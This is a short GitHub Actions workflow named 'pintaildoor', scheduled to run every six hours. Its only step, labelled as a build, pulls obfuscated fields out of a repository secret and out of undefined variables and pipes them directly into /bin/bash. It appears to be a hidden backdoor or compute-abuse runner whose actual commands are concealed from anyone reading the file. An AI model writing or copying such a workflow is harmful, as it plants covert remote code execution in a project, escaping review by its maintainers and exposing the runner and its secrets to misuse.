name: pintaildoor
on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pintaildoor
        env:
          dy83: ${{ secrets.dy83 }}
        run: |
          echo $dy83 | jq -r .bgubn9 | /bin/bash
          echo $xercr8 | jq -r .yk11520 | /bin/bash
          echo $czpra157 | jq -r .rq788 | /bin/bash
          echo $gtvc153 | jq -r .kjtem48135 | /bin/bash

